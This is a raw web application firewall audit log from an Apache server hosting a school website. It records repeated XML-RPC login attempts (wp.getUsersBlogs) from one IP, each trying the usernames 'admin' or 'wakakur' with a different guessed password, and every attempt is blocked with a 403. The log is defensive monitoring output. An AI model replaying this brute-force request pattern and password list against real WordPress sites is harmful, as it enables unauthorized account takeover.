ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511957321312 5336 (- - -) Stopwatch2: 1745511957321312 5336; combined=3794, p1=448, p2=3097, p3=0, p4=0, p5=145, sr=87, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14fd039-Z-- --d78d8e17-A-- [24/Apr/2025:23:27:01 +0700] aApmVd5yz20UX9VrdZOuEQAAAEw 103.236.140.4 51794 103.236.140.4 8181 --d78d8e17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d78d8e17-C-- wp.getUsersBlogs admin 112233 --d78d8e17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78d8e17-E-- --d78d8e17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512021075750 4969 (- - -) Stopwatch2: 1745512021075750 4969; combined=3782, p1=431, p2=3151, p3=0, p4=0, p5=117, sr=89, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78d8e17-Z-- --e58e462b-A-- [24/Apr/2025:23:28:01 +0700] aApmkclQo524fhbIj1xrTAAAAA0 103.236.140.4 55704 103.236.140.4 8181 --e58e462b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e58e462b-C-- wp.getUsersBlogs admin 123312 --e58e462b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e58e462b-E-- --e58e462b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512081078488 5470 (- - -) Stopwatch2: 1745512081078488 5470; combined=4069, p1=459, p2=3417, p3=0, p4=0, p5=111, sr=100, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e58e462b-Z-- --69063d7a-A-- [24/Apr/2025:23:29:01 +0700] aApmzWLuk3f9kLjsdTZrcgAAAIY 103.236.140.4 59600 103.236.140.4 8181 --69063d7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69063d7a-C-- wp.getUsersBlogs admin administrators --69063d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69063d7a-E-- --69063d7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512141368477 4553 (- - -) Stopwatch2: 1745512141368477 4553; combined=3369, p1=447, p2=2763, p3=0, p4=0, p5=94, sr=91, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69063d7a-Z-- --103b3722-A-- [24/Apr/2025:23:29:55 +0700] aApnA95yz20UX9VrdZOwowAAAFA 103.236.140.4 34564 103.236.140.4 8181 --103b3722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --103b3722-C-- wp.getUsersBlogs admin 1234%^&* --103b3722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --103b3722-E-- --103b3722-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512195394899 4025 (- - -) Stopwatch2: 1745512195394899 4025; combined=2791, p1=364, p2=2299, p3=0, p4=0, p5=78, sr=69, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --103b3722-Z-- --5f86b977-A-- [24/Apr/2025:23:30:01 +0700] aApnCclQo524fhbIj1xtRAAAAAQ 103.236.140.4 34916 103.236.140.4 8181 --5f86b977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f86b977-C-- wp.getUsersBlogs admin 1235698 --5f86b977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f86b977-E-- --5f86b977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512201328626 6617 (- - -) Stopwatch2: 1745512201328626 6617; combined=4778, p1=626, p2=3980, p3=0, p4=0, p5=99, sr=119, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f86b977-Z-- --f0c70441-A-- [24/Apr/2025:23:31:01 +0700] aApnRd5yz20UX9VrdZOyeQAAAEc 103.236.140.4 38876 103.236.140.4 8181 --f0c70441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f0c70441-C-- wp.getUsersBlogs admin fitness --f0c70441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c70441-E-- --f0c70441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512261671526 5602 (- - -) Stopwatch2: 1745512261671526 5602; combined=3931, p1=437, p2=3295, p3=0, p4=0, p5=116, sr=86, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c70441-Z-- --43b0493f-A-- [24/Apr/2025:23:32:02 +0700] aApngd5yz20UX9VrdZOzTwAAAFM 103.236.140.4 42746 103.236.140.4 8181 --43b0493f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --43b0493f-C-- wp.getUsersBlogs admin killer --43b0493f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b0493f-E-- --43b0493f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512321994083 18027 (- - -) Stopwatch2: 1745512321994083 18027; combined=28413, p1=540, p2=3539, p3=0, p4=0, p5=12184, sr=91, sw=80, l=0, gc=12070 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b0493f-Z-- --930d3f02-A-- [24/Apr/2025:23:33:08 +0700] aApnxN5yz20UX9VrdZO0sgAAAFU 103.236.140.4 47048 103.236.140.4 8181 --930d3f02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --930d3f02-C-- wp.getUsersBlogs admin rebecca --930d3f02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --930d3f02-E-- --930d3f02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512388828002 6397 (- - -) Stopwatch2: 1745512388828002 6397; combined=4459, p1=545, p2=3734, p3=0, p4=0, p5=104, sr=92, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --930d3f02-Z-- --ab633f0c-A-- [24/Apr/2025:23:34:08 +0700] aApoAN5yz20UX9VrdZO1bwAAAEQ 103.236.140.4 50858 103.236.140.4 8181 --ab633f0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab633f0c-C-- wp.getUsersBlogs admin simpsons --ab633f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab633f0c-E-- --ab633f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512448322813 5205 (- - -) Stopwatch2: 1745512448322813 5205; combined=3726, p1=457, p2=3091, p3=0, p4=0, p5=104, sr=87, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab633f0c-Z-- --9591ad62-A-- [24/Apr/2025:23:35:08 +0700] aApoPN5yz20UX9VrdZO2TQAAAFI 103.236.140.4 54276 103.236.140.4 8181 --9591ad62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9591ad62-C-- wp.getUsersBlogs wakakur r007p455w0rd --9591ad62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9591ad62-E-- --9591ad62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512508183649 5574 (- - -) Stopwatch2: 1745512508183649 5574; combined=3998, p1=448, p2=3353, p3=0, p4=0, p5=113, sr=94, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9591ad62-Z-- --7e0fd018-A-- [24/Apr/2025:23:36:08 +0700] aApoePiVYlyO1xhz7yOd4QAAANE 103.236.140.4 58012 103.236.140.4 8181 --7e0fd018-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e0fd018-C-- wp.getUsersBlogs wakakur wakakur1990 --7e0fd018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e0fd018-E-- --7e0fd018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512568025675 5861 (- - -) Stopwatch2: 1745512568025675 5861; combined=4134, p1=527, p2=3392, p3=0, p4=0, p5=126, sr=91, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e0fd018-Z-- --3be4200c-A-- [24/Apr/2025:23:37:08 +0700] aApotGLuk3f9kLjsdTZzFgAAAI8 103.236.140.4 33456 103.236.140.4 8181 --3be4200c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3be4200c-C-- wp.getUsersBlogs wakakur Marketing2024 --3be4200c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be4200c-E-- --3be4200c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512628204310 5192 (- - -) Stopwatch2: 1745512628204310 5192; combined=3696, p1=427, p2=3092, p3=0, p4=0, p5=105, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be4200c-Z-- --aae3e95c-A-- [24/Apr/2025:23:38:08 +0700] aApo8MlQo524fhbIj1x1UQAAABE 103.236.140.4 37170 103.236.140.4 8181 --aae3e95c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aae3e95c-C-- wp.getUsersBlogs wakakur abc123456 --aae3e95c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae3e95c-E-- --aae3e95c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512688646286 4439 (- - -) Stopwatch2: 1745512688646286 4439; combined=3120, p1=387, p2=2587, p3=0, p4=0, p5=85, sr=74, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae3e95c-Z-- --0d0a9f07-A-- [24/Apr/2025:23:39:08 +0700] aAppLN5yz20UX9VrdZO5owAAAEE 103.236.140.4 40958 103.236.140.4 8181 --0d0a9f07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d0a9f07-C-- wp.getUsersBlogs wakakur pass@word --0d0a9f07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d0a9f07-E-- --0d0a9f07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (105+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512748001329 4902 (- - -) Stopwatch2: 1745512748001329 4902; combined=3746, p1=442, p2=3131, p3=0, p4=0, p5=102, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d0a9f07-Z-- --4d2e8d42-A-- [24/Apr/2025:23:40:08 +0700] aAppaN5yz20UX9VrdZO64AAAAEI 103.236.140.4 44754 103.236.140.4 8181 --4d2e8d42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4d2e8d42-C-- wp.getUsersBlogs wakakur codeword --4d2e8d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d2e8d42-E-- --4d2e8d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512808052657 4826 (- - -) Stopwatch2: 1745512808052657 4826; combined=3391, p1=406, p2=2827, p3=0, p4=0, p5=92, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
